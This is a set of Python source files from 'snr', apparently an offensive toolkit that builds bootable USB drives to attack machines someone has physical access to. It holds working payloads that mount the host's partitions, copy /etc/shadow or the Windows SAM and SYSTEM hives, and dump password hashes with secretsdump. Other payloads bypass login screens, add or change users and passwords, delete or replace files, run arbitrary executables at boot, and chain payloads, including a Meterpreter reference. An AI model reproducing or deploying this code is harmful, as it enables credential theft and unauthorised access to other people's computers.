"""
Add the finishing touch to the host rootfs
"""
import json
import os.path

from snr.core.core import context
from snr.core.payload_generation import common
from snr.core.util import chroot_programs, common_utils, programs

__all__ = (
    "finish_host",
)

FSTAB_FORMAT = """\
# Snr-generated fstab
# <file system>  <mount point>  <type>  <options>          <dump>  <pass>
UUID={root_uuid} /              ext4    errors=remount-ro  0       1
UUID={esp_uuid}  /boot/efi      vfat    umask=0077         0       0
"""


def finish_host(ctx: context.Context) -> bool:  # pylint: disable=too-many-return-statements
    """Add the finishing touch to the host rootfs

    Args:
        ctx: Context

    Returns:
        Whatever operation was successful or not
    """
    common_utils.print_debug("Adding the finishing touch to the target")
    lsblk = programs.Lsblk(stdout=programs.PIPE, stderr=programs.STDOUT)
    errorcode = lsblk.invoke_and_wait(None, ctx.device_name, options={
                                      "J": None, "o": "NAME,UUID"})
    assert lsblk.stdout is not None
    if errorcode != 0:
        common_utils.print_debug(f"Command's output: {lsblk.stdout.read()}")
        return common.clean_and_exit(ctx, "Discovering partition UUIDs failed", True, True)
    parts_info = json.load(lsblk.stdout)["blockdevices"][0]["children"]
    esp_part_name = os.path.basename(ctx.construct_partition_path(2))
    root_part_name = os.path.basename(ctx.construct_partition_path(3))
    esp_uuid = None
    root_uuid = None
    for part_info in parts_info:
        if part_info["name"] == esp_part_name:
            esp_uuid = part_info["uuid"]
        if part_info["name"] == root_part_name:
            root_uuid = part_info["uuid"]
    if esp_uuid is None:
        return common.clean_and_exit(ctx, "ESP UUID not found!", True, True)
    if root_uuid is None:
        return common.clean_and_exit(ctx, "Rootfs UUID not found!", True, True)
    with common_utils.rootfs_open(ctx, "etc/fstab", "w", encoding="ascii") as stream:
        stream.write(FSTAB_FORMAT.format(
            esp_uuid=esp_uuid, root_uuid=root_uuid))
    common_utils.print_debug("Generating initramfs")
    update_initramfs = chroot_programs.update_initramfs_factory(ctx)(
        stdout=chroot_programs.PIPE,
        stderr=chroot_programs.STDOUT,
        sudo=True)
    errorcode = update_initramfs.invoke_and_wait(None, options={
        "c": None, "k": "all",
    })
    if errorcode != 0:
        assert update_initramfs.stdout is not None
        common_utils.print_debug(
            f"Command's output: {update_initramfs.stdout.read()}")
        return common.clean_and_exit(ctx, "Generating initramfs failed", True, True)
    common_utils.print_debug("Updating grub configuration")
    with common_utils.rootfs_open(ctx, "etc/default/grub", "r",
                                  encoding="ascii") as stream:
        grub_cfg = stream.read()
        grub_cfg = grub_cfg.replace("GRUB_TIMEOUT=5", "GRUB_TIMEOUT=0")
        grub_cfg = grub_cfg.replace(
            "#GRUB_DISABLE_RECOVERY=\"true\"", "GRUB_DISABLE_RECOVERY=\"true\"")
    with common_utils.rootfs_open(ctx, "etc/default/grub", "w",
                                  encoding="ascii") as stream:
        stream.write(grub_cfg)

    common.bind_required_rootfs_dirs(ctx)
    update_grub = chroot_programs.update_grub_factory(ctx)(
        stdout=chroot_programs.PIPE,
        stderr=chroot_programs.STDOUT,
        sudo=True)
    errorcode = update_grub.invoke_and_wait(None)
    if errorcode != 0:
        assert update_grub.stdout is not None
        common_utils.print_debug(
            f"Command's output: {update_grub.stdout.read()}")
        return common.clean_and_exit(ctx, "Updating grub configuration failed")

    common_utils.print_debug("Clearing root password")
    passwd = chroot_programs.passwd_factory(ctx)(
        stdout=chroot_programs.PIPE,
        stderr=chroot_programs.STDOUT,
        sudo=True)

    errorcode = passwd.invoke_and_wait(None, "root",
                                       options={
                                           "d": None,
                                           "q": None
                                       })

    if errorcode != 0:
        assert passwd.stdout is not None
        common_utils.print_debug(
            f"Command's output: {passwd.stdout.read()}")
        common.unbind_required_rootfs_dirs(ctx)
        return common.clean_and_exit(ctx, "Clearing root password failed")
    common.unbind_required_rootfs_dirs(ctx)
    common_utils.print_debug("Fixing up owner on the rootfs")
    chown = programs.Chown(sudo=True)
    errorcode = chown.invoke_and_wait(None, "root:root", ctx.root_directory, options={
        "recursive": None,
    })
    if errorcode != 0:
        return common.clean_and_exit(ctx, "Preparing to install grub failed", True, True)
    return True



"""
Wrap os and shutil functions around a specific path
"""

import os
import os.path
import shutil
from types import TracebackType
from typing import IO, Any

__all__ = (
    "PathWrapperBase",
)


class PathWrapperBase:
    """
    Base class for wrapping os and shutil functions around a specific path
    """
    _path_var_name: str

    def __init__(self, path: str):
        self._path = path
        self._path_var_name = "_path"

    def __init_subclass__(cls, path_var_name: str) -> None:
        cls._path_var_name = path_var_name

    def _get_path(self) -> str:
        return getattr(self, self._path_var_name) # type: ignore 

    def join(self, *paths: str) -> str:
        """Join paths with the wrapped path

        Returns:
            Absolute path
        """
        return os.path.join(self._get_path(), *paths)

    def dirname(self, path: str) -> str:
        """Return directory name (parent) of path, inside the wrapped path

        Args:
            path: Path to work on 

        Returns:
            Parent of path as it would be inside the wrapped path, to get the absolute path of that
            use join on it.
        """
        # Special case: Call dirname without joining
        # Otherwise we would create absolute paths that cannot
        # be used with the rest of the functions in this class
        return os.path.dirname(path)

    def exists(self, path: str) -> bool:
        """Check if the specified path exists inside the wrapped path

        Args:
            path: Path to work on 

        Returns:
            Whatever it exists or not
        """
        return os.path.exists(self.join(path))

    def isdir(self, path: str) -> bool:
        """Check if the specified path is a directory or not

        Args:
            path: Path to work on

        Returns:
            Whatever it is a directory or not
        """
        return os.path.isdir(self.join(path))

    def isfile(self, path: str) -> bool:
        """Check if the specified path is a file or not

        Args:
            path: Path to work on

        Returns:
            Whatever it is a file or not
        """
        return os.path.isfile(self.join(path))

    def islink(self, path: str) -> bool:
        """Check if the specified path is a link or not

        Args:
            path: Path to work on

        Returns:
            Whatever it is a link or not
        """
        return os.path.islink(self.join(path))

    def open(self, file: str, mode: str = "r", buffering: int = -1, encoding: str | None = None) -> IO[Any]:
        """Open a file in the wrapped directory

        Args:
            file: The name of the file to open.
            mode: The mode to open the file in.
            buffering: The buffering size in bytes.
            encoding: The encoding to use.

        Returns:
            file-like object
        """
        stream = open(self.join(file), mode, buffering,  # pylint: disable=consider-using-with
                      encoding)

        def __enter__() -> IO[Any]:  # pylint: disable=unused-variable
            return stream.__enter__()

        def __exit__(exc_type: type[BaseException] | None,  # pylint: disable=unused-variable
                     exc_val: BaseException | None,
                     exc_tb: TracebackType | None) -> None:  # pylint: disable=unused-variable
            return stream.__exit__(exc_type, exc_val, exc_tb)
        return stream

    def remove(self, path: str) -> None:
        """Remove file in the wrapped directory

        Args:
            path: Path to work on
        """
        os.remove(self.join(path))

    def copy(self, src: str, dest: str, follow_symlinks: bool = True) -> str:
        """Copy file

        Args:
            src: Source file
            dest: Destination file
            follow_symlinks: Whatever to follow symbolic links or not. Defaults to True

        Returns:
            Destination path
        """
        if not os.path.isabs(src):
            src = self.join(src)
        dest = self.join(dest)
        shutil.copy(src, dest, follow_symlinks=follow_symlinks)
        # Shutil will return the absolute path, we cannot return that
        return dest

    def link(self, src: str, dest: str, follow_symlinks: bool = True) -> None:
        """Create a symbolic link

        Args:
            src: link source (or target)
            dest (str): link destination (or the link file itself)
            follow_symlinks (bool, optional): _description_. Defaults to True.
        """
        if not os.path.isabs(src):
            src = self.join(src)
        dest = self.join(dest)
        os.link(src, dest, follow_symlinks=follow_symlinks)

    def mkdir(self, dir_path: str, mode: int = 511) -> None:
        """Create a directory if it doesn't exist

        Args:
            path: Path to the directory to create
            mode: Permissions to set for the directory
        """
        os.mkdir(self.join(dir_path), mode=mode)

    def makedirs(self, dir_path: str, mode: int = 511, exist_ok: bool = False) -> None:
        """Create directories

        Args:
            ctx: Context
            path: Path to directory to create
            mode: Directory permissions. Defaults to 511
            exist_ok: Whatever it's okay for directories to exist or not. Defaults to False
        """
        os.makedirs(self.join(dir_path), mode, exist_ok)

    def copytree(self, src: str, dest: str, symlinks: bool = False,
                 ignore_dangling_symlinks: bool = False,
                 dirs_exist_ok: bool = False) -> str:
        """Copy a directory and it's content

        Args:
            src: Directory to copy
            dest: Directory to copy to
            symlinks: Whatever to copy symbolic links or their content. Defaults to False
            ignore_dangling_symlinks: Whatever to ignore invalid symlinks. Defaults to False
            dirs_exist_ok (bool, optional): Whatever it's okay if destination directories already exist. Defaults to False

        Returns:
            destination
        """
        if not os.path.isabs(src):
            src = self.join(src)
        shutil.copytree(src, self.join(dest), symlinks,
                        ignore_dangling_symlinks=ignore_dangling_symlinks,
                        dirs_exist_ok=dirs_exist_ok)
        return dest

    def listdir(self, path: str) -> list[str]:
        """List contents of a directory

        Args:
            path: Path to work on

        Returns:
            List of all of the content of the directory
        """
        return os.listdir(self.join(path))

    def rmtree(self, path: str, ignore_errors: bool = False) -> None:
        """Remove a directory

        Args:
            path: Path to work on
            ignore_errors: Whatever to ignore any errors or not. Defaults to False.
        """
        shutil.rmtree(self.join(path), ignore_errors)

    def wrap(self, path: str) -> 'PathWrapperBase':
        """Create a new path wrapper for the specific path inside the already wrapped path

        Args:
            path: Path to wrap

        Returns:
            A path wrapper wrapping the specified path
        """
        return PathWrapperBase(self.join(path))



"""
Change user, group and related login information. Only UNIX-like environments are supported (yet)
"""
from snr.core.payload.payload import Context, Payload


class UserManagementPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("GNU/Linux",)
    INPUTS = (
        ("PAIRS", [], -1, "User:Password pairs, Changes user's password"),
        ("USERS", [], -1, "List of users to add or delete, -<USERNAME> deletes a user"),
        ("GROUPS", [], -1, "List of groups to add or delete, -<USERNAME> deletes a group"),
        ("ADD_TO", [], -1, "User:Group pairs, add User to Group"),
        ("REMOVE_FROM", [], -1, "User:Group pairs, remove User from Group"),
        ("SHELLS", [], -1, "User:Shell pairs, makes User use Shell as it's default shell"),
        ("UNLOCK", [], -1, "List of users to unlock, -<USERNAME> will lock it instead"),
        ("PASSPHRASES", [], -1, "Passphrases to try for LUKS-encrypted partitions"),
        ("DEFAULT_PASSWORD", "Aa12!aaaaaaaaa", 32,
         "Default password for newly added users")
    )

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        self.format_payload_and_write(ctx, variables)
        self.add_autorun(ctx)
        return 0


payload = UserManagementPayload()



"""
Extract all account login hashes
"""

from snr.core.payload.payload import Context, Payload


class AccountHashesPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Microsoft Windows", "GNU/Linux")
    ROOTFS_VERSION = 2
    INPUTS = (
        ("PASSPHRASES", [], -1, "Passphrases to try for LUKS-encrypted partitions"),
    )

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        self.format_payload_and_write(ctx, variables)
        self.add_autorun(ctx)
        return 0


payload = AccountHashesPayload()



"""
Use multiple payloads. To use:
  1. Set variable `PAYLOADS` to all the payloads you want (for example: set PAYLOADS extraction/install_account_hashes;infection/meterpreter)
  2. Load the payload (use misc/multi)
  3. Set all the variables the payloads you selected need
  4. Use generate normally

Note that loading misc/multi and then setting PAYLOADS does not do anything. It should be done BEFORE loading the payload.
"""
from snr.cli import variables
from snr.core.payload.payload import Context, Payload
from snr.core.payload_generation import generation


class MultiPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Any",)

    _payloads: list[Payload]
    _payload_names: list[str]

    def load(self) -> int:
        payloads: list[str] = []
        self._payloads = []
        if variables.global_vars.get_variable_info("PAYLOADS").var_type == str:
            # We haven't been loaded before
            payloads.extend(variables.global_vars.get_variable_str(
                "PAYLOADS").split(";"))
        else:
            # We have been loaded before
            payloads.extend(
                variables.global_vars.get_variable_list("PAYLOADS"))
        variables.global_vars.del_variable("PAYLOADS")
        # For many reasons, including ensuring the user doesn't end up deleting this variable
        self.INPUTS = ((
            "PAYLOADS", payloads, -1, "Payloads to load. Not effective after loading the payload"
        ),)
        self._payload_names = payloads
        # Now, load the payloads
        for path in payloads:
            payload_instance = generation.load(path)
            if payload_instance is None:
                return 1
            self._payloads.append(
                payload_instance)  # pylint: disable=no-member
        errorcode = super().load()
        if errorcode != 0:
            self.unload()
            return errorcode
        return 0

    def generate(self, ctx: Context) -> int:
        for i, p in enumerate(self._payloads):
            if not generation.generate(self._payload_names[i], p, ctx):
                self.unload()
                return 1
        return 0

    def unload(self) -> int:
        # While it's true that most payloads don't even have a custom unload method
        # and use the default one which does absolutely nothing. We never know, one may do.
        for i, p in enumerate(self._payloads):
            generation.unload(self._payload_names[i], p)
        return 0


payload = MultiPayload()



"""
Payload generation process
"""
import importlib
import os

from snr.core.core import options
from snr.core.payload import payload
from snr.core.util import common_utils

__all__ = (
    "load", "generate",
    "unload"
)

_orig_path: str


def load(path: str, store_cwd: bool = False) -> payload.Payload | None:
    """Load a payload

    Args:
        path: Where the payload's package is
        store_cwd (bool, optional): Whatever to override the original cwd or not. 
                                    Don't use it unless you absolutely know what you are doing.
                                    Defaults to False.

    Returns:
        Loaded payload or None if loading failed
    """
    if store_cwd:
        global _orig_path  # pylint: disable=global-statement
        _orig_path = os.getcwd()
    with common_utils.temp_chdir(_orig_path):
        orig_path = path
        common_utils.print_debug(f"Trying to load payload {orig_path}")
        path = path.replace("/", ".").replace("\\", ".")
        module = importlib.import_module(path)
        if not hasattr(module, "payload"):
            common_utils.print_error(f"{path} is not a valid payload")
            return None
        common_utils.print_debug(
            f"Calling load() function of payload {orig_path}")
        with common_utils.temp_chdir(orig_path):
            errorcode = common_utils.call_external_function(
                module.payload.load)
        if errorcode or errorcode is common_utils.EXTERNAL_CALL_FAILURE:
            common_utils.print_error(
                f"Payload {orig_path} failed to load ({errorcode})")
            del module
            return None
        if options.payload_module is None:
            options.payload_module = module
            options.payload_path = path
        return getattr(module, "payload")


def generate(name: str, p: payload.Payload, ctx: payload.Context) -> int:
    """Generate a loaded payload

    Args:
        name: Name of the payload, which is usually the relative path to the payload
        p: Payload to generate
        ctx: Context

    Returns:
        0 if successful, otherwise any other value
    """
    with common_utils.temp_chdir(_orig_path):
        common_utils.print_info(
            f"Generating payload {name}")
        with common_utils.temp_chdir(name):
            errorcode = common_utils.call_external_function(p.generate, ctx)
            if errorcode or errorcode is common_utils.EXTERNAL_CALL_FAILURE:
                common_utils.print_error(
                    f"Payload {name} failed to generate")
                return errorcode
    return 0


def unload(name: str, p: payload.Payload) -> int:
    """Unload a payload

    Args:
        name: Name of the payload, which is usually the relative path to the payload
        p: Payload to unload

    Returns:
        0 if successful, otherwise any other value. Even if an error had occurred, unload must not be called again.
    """
    common_utils.print_debug(f"Calling unload() function of payload {name}")
    return p.unload()



"""
Bypass the login screen

For Windows, after login invoke the accessibility settings or on-screen keyboard.
For linux, change TTY using Ctrl+Alt+F<X> with X being one of the Function keys you have.
With Linux on a laptop, try Ctrl+Alt+Fn+F<X> if without Fn it doesn't seem to work.
"""
from snr.core.payload.payload import Context, Payload


class PirateFlagPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Microsoft Windows", "GNU/Linux")
    INPUTS = (
        ("PASSPHRASES", [], -1, "Passphrases to try for LUKS-encrypted partitions"),
    )

    def generate(self, ctx: Context) -> int:
        self.copy_root_to_root(
            ctx, __file__, "payload.py", "root/payload.py")
        self.add_autorun(ctx, "root/payload.py")
        return 0


payload = PirateFlagPayload()



"""
Access and copy files by pattern
"""

from snr.core.payload.payload import Context, Payload


class FilesPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Microsoft Windows", "GNU/Linux")
    INPUTS = (
        ("PATTERNS", [], -1, "Glob pattern for files to copy", True),
        ("PASSPHRASES", [], -1, "Passphrases to try for LUKS-encrypted partitions"),
    )

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        self.format_payload_and_write(ctx, variables)
        self.add_autorun(ctx)
        return 0


payload = FilesPayload()



#!/usr/bin/python3
"""
Account_hashes payload
"""
from snr.core.payload import data_dir, entry_point, storage
from snr.core.util import common_utils, programs

PASSPHRASES = "@PASSPHRASES@"

SecretsDumpPy = programs.program_wrapper_factory("secretsdump.py")


@entry_point.entry_point
def main() -> None:
    block_info, _, our_device = storage.setup()
    common_utils.print_info("Account_hashes payload started")
    for part in storage.query_all_partitions(block_info):
        if storage.get_partition_root(part, block_info) == our_device:
            continue
        with storage.mount_partition(part, PASSPHRASES) as mounted_part:
            part_info = storage.query_partition_info_by_path(part, block_info)
            assert part_info is not None
            part_data = data_dir.wrap_data_path_for_block(part_info)
            # Try to see if we are dealing with any sort of Linux
            if (mounted_part.exists("usr/sbin/init") or mounted_part.exists("usr/bin/init")) \
                    and mounted_part.exists("etc/shadow"):
                # It must be linux or at least it uses shadow, that's all we care about
                part_data.copy(mounted_part.join("etc/shadow"), "hashes")
            elif mounted_part.exists("Windows"):
                # First, copy the SAM and SYSTEM so if we failed to
                # extract for whatever reason, not all hope would be lost
                part_data.copy(mounted_part.join(
                    "Windows/System32/Config/SAM"), "SAM")
                part_data.copy(mounted_part.join(
                    "Windows/System32/Config/SYSTEM"), "SYSTEM")
                secrets_dump_py = SecretsDumpPy(stdout=programs.PIPE)
                errorcode = secrets_dump_py.invoke_and_wait(
                    None, "-sam", part_data.join("SAM"), "-system", part_data.join("SYSTEM"), "LOCAL")
                if errorcode != 0:
                    common_utils.print_warning(
                        "Extracting hash information failed! SAM and SYSTEM are already copied")
            else:
                common_utils.print_warning("Unknown operating system!")

    common_utils.print_ok("Account_hashes payload completed")



"""
Payload-related commands
"""
import os
import sys

import click

from snr.cli import interactive_shell, variables
from snr.core.core import context, options
from snr.core.payload_generation import (common, generation,
                                         payload_generation_post,
                                         payload_generation_pre)
from snr.core.util import common_utils, programs
from snr.core.util.payloads import install_snr_core


@interactive_shell.interactive_shell.command(name="use")
@click.argument("payload", type=click.Path(exists=True, file_okay=False), required=False)
def cmd_use(payload: str) -> str | None:
    """\
Use a payload
    """
    if options.payload_module is not None or \
            (payload is None and options.payload_module is not None):
        generation.unload(options.payload_path, getattr(
            options.payload_module, "payload"))
        options.payload_module = None
        options.payload_path = ""
        interactive_shell.prompt = options.PROMPT_UNLOADED
        if len(payload) == 0:
            common_utils.print_info("Payload unloaded")
            return None
    cwd = os.getcwd()
    common_utils.print_debug(f"Appending '{cwd}' to sys.path")
    sys.path.append(cwd)
    payload_instance = generation.load(payload, store_cwd=True)
    sys.path.remove(cwd)
    if payload_instance is None:
        return None
    common_utils.print_info("Payload loaded")
    options.payload_module = sys.modules[payload_instance.__module__]
    options.payload_path = payload
    interactive_shell.prompt = options.PROMPT_LOADED_FORMAT.format(
        payload)
    # Add standard options
    variables.global_vars.set_variable(
        "VERBOSITY", "normal", -1, "Payload verbosity: Either quiet, normal, verbose or debug", True)
    return None


@interactive_shell.interactive_shell.command(name="generate")
@click.argument("device", type=click.Path(exists=True, dir_okay=False, writable=True), required=True)
def cmd_generate(device: str) -> str | None:
    """\
Generate a selected payload, pass device to write to as an argument
    """
    if options.payload_module is None:
        common_utils.print_error("No payload selected")
        return None
    verbosity = variables.global_vars.get_variable_str("VERBOSITY").lower()
    if verbosity not in ("quiet", "normal", "verbose", "debug"):
        common_utils.print_error(f"Unknown verbosity '{verbosity}'")
        return None
    common_utils.print_debug("Starting payload generation process")
    ctx = context.Context(device)
    common_utils.print_info("Generating payload")
    common_utils.print_debug("Starting pre payload generation process")
    if not payload_generation_pre(ctx):
        common_utils.print_error("Payload pre generation failed")
        return None
    install_snr_core.install_snr_core_lib(ctx)
    common_utils.print_debug(
        "Pre payload generation steps completed successfully")
    errorcode = generation.generate(options.payload_path, getattr(
        options.payload_module, "payload"), ctx)
    if errorcode != 0:
        common.clean_and_exit(
            ctx, f"Payload generation failed ({repr(errorcode)})")
        return None
    common_utils.print_debug(
        "Payload generated successfully. Starting post payload generation steps")
    if not payload_generation_post(ctx, verbosity):
        common_utils.print_error("Payload post generation failed")
        common.clean_on_success(ctx, True, True)
        return None
    programs.Sync().invoke_and_wait(None)
    common_utils.print_ok("Payload generation process complete")
    common_utils.print_debug(
        "Cleaning up after the payload generation process")
    common.clean_on_success(ctx, True, True)
    return None



#!/usr/bin/python3
"""
Files payload
"""
import glob
import os

from snr.core.payload import entry_point, storage
from snr.core.util import common_utils

FILES = "@FILES@"
PASSPHRASES = "@PASSPHRASES@"


@entry_point.entry_point
def main() -> None:
    block_info, _, our_device = storage.setup()
    common_utils.print_info("Files payload started")
    for part in storage.query_all_partitions(block_info):
        if storage.get_partition_root(part, block_info) == our_device:
            continue
        with storage.mount_partition(part, PASSPHRASES) as mounted_part:
            for file in FILES:
                pattern, action, arg = file.split(":", maxsplit=2)
                paths = glob.glob(pattern, root_dir=mounted_part.mount_point,
                                  recursive=True)
                common_utils.print_info(
                    f"Pattern '{pattern}' resulted into {len(paths)} matches. Modifying...")
                for path in paths:
                    if mounted_part.isdir(path):
                        mounted_part.rmtree(path)
                    else:
                        mounted_part.remove(path)
                    match action:
                        case "delete":
                            # Already done
                            pass
                        case "replace":
                            try:
                                if mounted_part.isdir(arg):
                                    mounted_part.copytree(
                                        os.path.join(os.getcwd(), arg), path)
                                else:
                                    mounted_part.copy(arg, path)
                            except Exception:
                                common_utils.print_warning(
                                    f"Replace action failed on {mounted_part.join(path)}")
                        case "replace_local":
                            try:
                                if mounted_part.isdir(arg):
                                    mounted_part.copytree(arg, path)
                                else:
                                    mounted_part.copy(arg, path)
                            except Exception:
                                common_utils.print_warning(
                                    f"Replace_local action failed on {mounted_part.join(path)}")
    common_utils.print_ok("Files payload completed")



"""
Show a pirate flag with a red background. Not very practical, included only for pranking
"""
from snr.core.payload.payload import Context, Payload


class PirateFlagPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Any",)

    def generate(self, ctx: Context) -> int:
        self.copy_root_to_root(
            ctx, __file__, "payload.py", "root/payload.py")
        self.add_autorun(ctx, "root/payload.py")
        return 0


payload = PirateFlagPayload()



"""
Run an executable on boot, the executable will be copied to the host filesystem.
If you want to run an executable that is already available on the host. Use run_command.
It does not copy the executable onto the host filesystem.
Do note that this payload does preserve ordering
"""
import os.path
import shutil

from snr.core.payload.payload import Context, Payload
from snr.core.util import common_utils


class RunCommandPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Any",)
    INPUTS = (
        ("EXECUTABLES", [], -1, "Executables to copy and run", True),
    )

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        assert isinstance(variables["EXECUTABLES"], list)
        if len(variables["EXECUTABLES"]) == 0:
            common_utils.print_error("Nothing selected to run")
            return 1
        for executable in variables["EXECUTABLES"]:
            basename = os.path.basename(executable)
            target = os.path.join("root", basename)
            if not os.path.isabs(executable):
                # Does it exist on the current working directory?
                if os.path.exists(os.path.abspath(executable)):
                    # Then it's fine
                    executable = os.path.abspath(executable)
                else:
                    # Does it exist on PATH?
                    tmp = shutil.which(executable)
                    if tmp is None:
                        # We can't find it
                        common_utils.print_error(
                            f"Could not find '{executable}'! Check that you have typed correctly")
                        return 1
                    else:
                        executable = tmp

            common_utils.print_debug(f"Copying '{executable}' to '{target}'")
            try:
                shutil.copyfile(executable, ctx.join(target))
            except (OSError, shutil.Error) as exc:
                common_utils.print_error(
                    f"Installing executable to rootfs failed: {exc}")
                return 1
            common_utils.print_debug(
                f"Adding autorun service for '{executable}'")
            self.add_autorun(ctx, os.path.join("/", target))
        return 0


payload = RunCommandPayload()



"""
Variable-related commands
"""

import click
import rich.console
import rich.pretty
import rich.table

from snr.cli import interactive_shell, variables
from snr.core.core import variable_manager
from snr.core.util import common_utils


@interactive_shell.interactive_shell.command(name="unset")
@click.argument("name", required=True)
def cmd_unset(name: str) -> str | None:
    """\
Unset a variable
    """
    if not variables.global_vars.has_variable(name):
        common_utils.print_error(f"No variable named '{name}'")
        return None
    if variables.global_vars.get_variable_info(name).used_by_payload:
        common_utils.print_error("Cannot unset a variable used by a payload")
    else:
        variables.global_vars.del_variable(name)
    return None


@interactive_shell.interactive_shell.command(name="set")
@click.argument("name", required=False)
@click.argument("value", nargs=-1, required=False)
@click.pass_context
def cmd_set(ctx: click.Context, name: str | None, value: tuple[str, ...] | None) -> str | None:  # pylint: disable=too-many-return-statements
    """\
Set value of a variable (syntax: set <variable name> <value>).
Or unset a variable (syntax: set <variable name>).
Or list all variables (syntax: set)
    """
    if name is None:
        table = rich.table.Table(title="Variables")
        table.add_column("Name", style="blue")
        table.add_column("Type", style="red")
        table.add_column("Required", style="cyan")
        table.add_column("Length Limit", style="magenta")
        table.add_column("Value")
        table.add_column("Description", style="green")
        for var_name, info in zip(variables.global_vars.get_variables_name(),
                                  variables.global_vars.get_variables_info()):
            var_type = str(info.var_type.__name__).title()
            var_len = str(info.length) if info.length != -1 else "Unlimited"
            var_value = variables.global_vars.get_variable(var_name)
            if isinstance(var_value, list):
                var_value = " ".join(map(str, var_value))
            else:
                var_value = str(var_value)
            table.add_row(var_name, var_type, str(info.required), var_len,
                          var_value, info.description)
        if table.row_count == 0:
            table.add_row("", "", "", "", "")
        rich.console.Console().print(table)
        return None
    if value is None or len(value) == 0:
        return interactive_shell.dispatch_command(ctx, interactive_shell.interactive_shell, f"unset {name}")
    # Two scenarios are possible:
    #   1. The variable already exists, so already has type information
    #   2. The variable doesn't exist, so type is str
    assert value is not None
    if name.startswith("!"):
        # The value is a command to execute
        name = name.removeprefix("!")
        value = tuple(interactive_shell.dispatch_command(ctx,
                                                         interactive_shell.interactive_shell,
                                                         " ".join(value)).split(" "))
        if value is None:
            common_utils.print_warning("Command returned nothing, aborting")
            return None
    value_str = " ".join(value).strip()
    if variables.global_vars.has_variable(name):
        # Scenario one
        info = variables.global_vars.get_variable_info(name)
        new_value: variable_manager.VariableType
        match str(info.var_type.__name__):
            case "str":
                new_value = value_str
                if len(new_value) > info.length and info.length != -1:
                    common_utils.print_error(
                        f"'{value_str}' is too large to fit the variable")

                    return None
            case "bool":
                # It must be convertible into a bool
                match value_str.lower():
                    case "1" | "true" | "on":
                        new_value = True
                    case "0" | "false" | "off":
                        new_value = False
                    case _:
                        common_utils.print_error(
                            f"'{value}' is not a valid boolean")
                        return None
            case "int":
                # It must be convertible into an int
                try:
                    new_value = int(value_str)
                except ValueError:
                    common_utils.print_error(
                        f"'{value_str}' is not a valid integer")
                    return None
            case "list":
                new_value = value_str.split(";")
                if len(new_value) > info.length and info.length != -1:
                    common_utils.print_error(
                        f"'{value_str}' is too large to fit the variable")
                    return None
            case _:
                raise common_utils.UserError(
                    "Invalid type found as variable's type")
        variables.global_vars.set_variable(name, new_value, -1, "")
        common_utils.print_info(
            f"[blue]{name}[/blue][green] =>[/green]", rich.pretty.Pretty(new_value))
    else:
        variables.global_vars.set_variable(name, value_str, -1, "")
        common_utils.print_info(
            f"[blue]{name}[/blue][green] =>[/green]", rich.pretty.Pretty(value_str))
    return None



"""
Download a file from the internet
"""

import urllib.parse

import requests
from requests import RequestException

from snr.core.core import options

__all__ = (
    "download", "RequestException"
)


def download(url: str, path: str, timeout: int | None = None) -> None:
    """Download a file from the internet

    Args:
        url: URL to download
        path: Where to write the download file to 
    """
    parsed_url = urllib.parse.urlparse(url)
    if len(parsed_url.scheme) == 0:
        parsed_url = urllib.parse.urlparse(url, scheme="http")
    if parsed_url.scheme not in ("http", "https"):
        # Reject it
        raise ValueError(
            f"url parameter has invalid scheme '{parsed_url.scheme}'")
    with open(path, "wb") as stream:
        response = requests.get(
            url,
            cookies={"User-Agent": options.default_user_agent},
            timeout=timeout)
        stream.write(response.content)



"""
Context management utilities. Some snr functions require a context variable to work,
functions in this module help creating a context for a payload
"""

import os.path

from snr.core.core.context import Context
from snr.core.util import common_utils, programs

__all__ = (
    "create_context_for_mount_point", "require_context_for_mount_point",
    "Context"
)


def create_context_for_mount_point(mount_point: str) -> Context:
    """Create context for mount point

    Args:
        mount_point: Path to the mount point

    Returns:
        A Context instance for that mount point.
        The context is has level 3 but device_size is assumed 0.
        To get the size of the underlying device of a mountpoint,
        use the snr.core.payload.storage functions
    """
    mount = programs.Mount(stdout=programs.PIPE)
    mount.invoke_and_wait(None)
    assert mount.stdout is not None
    mtab_raw_data = mount.stdout.read()
    for line in mtab_raw_data.splitlines():
        source, _, dest, __ = line.split(maxsplit=3)
        if dest == mount_point:
            device = source
            break
    else:
        raise ValueError(f"'{mount_point}' is not a valid mount point")
    partitions_prefix = ""
    assert isinstance(device, str)
    if os.path.basename(device).startswith(("nvme", "loop")):
        partitions_prefix = "p"
    context = Context(device)
    context.to_level_1(0, True)
    context.to_level_2(partitions_prefix)
    context.to_level_3(mount_point)
    return context


def require_context_for_mount_point(mount_point: str) -> Context:
    """Get context for a mount point or exit

    Args:
        mount_point: Mount point to get the context for

    Raises:
        SystemExit: Could not find the mount point

    Returns:
        Context for the specified mount point
    """
    try:
        return create_context_for_mount_point(mount_point)
    except ValueError:
        common_utils.print_error(
            f"Creating context for '{mount_point}' failed")
        raise SystemExit(1) from None



"""
ProgramWrapper derivatives for common tools
"""

from snr.core.util.program_wrapper import (DEVNULL, PIPE, STDOUT,
                                           SubprocessError,
                                           program_wrapper_factory)

__all__ = (
    "DEVNULL", "PIPE",
    "STDOUT", "SubprocessError",
    "program_wrapper_factory",
    "Mount", "Umount",
    "Sync", "Vgscan",
    "Lvscan", "Cryptsetup",
    "Losetup", "Sgdisk",
    "Partprobe", "Chmod",
    "Lsblk", "Chown"
)

Debootstrap = program_wrapper_factory("debootstrap")
Mount = program_wrapper_factory("mount")
Umount = program_wrapper_factory("umount")
Sync = program_wrapper_factory("sync")
Vgscan = program_wrapper_factory("vgscan")
Lvscan = program_wrapper_factory("lvscan")
Pvchange = program_wrapper_factory("pvchange")
Cryptsetup = program_wrapper_factory("cryptsetup")
Losetup = program_wrapper_factory("losetup")
Sgdisk = program_wrapper_factory("sgdisk")
Partprobe = program_wrapper_factory("partprobe")
Chmod = program_wrapper_factory("chmod")
Lsblk = program_wrapper_factory("lsblk")
Chown = program_wrapper_factory("chown")



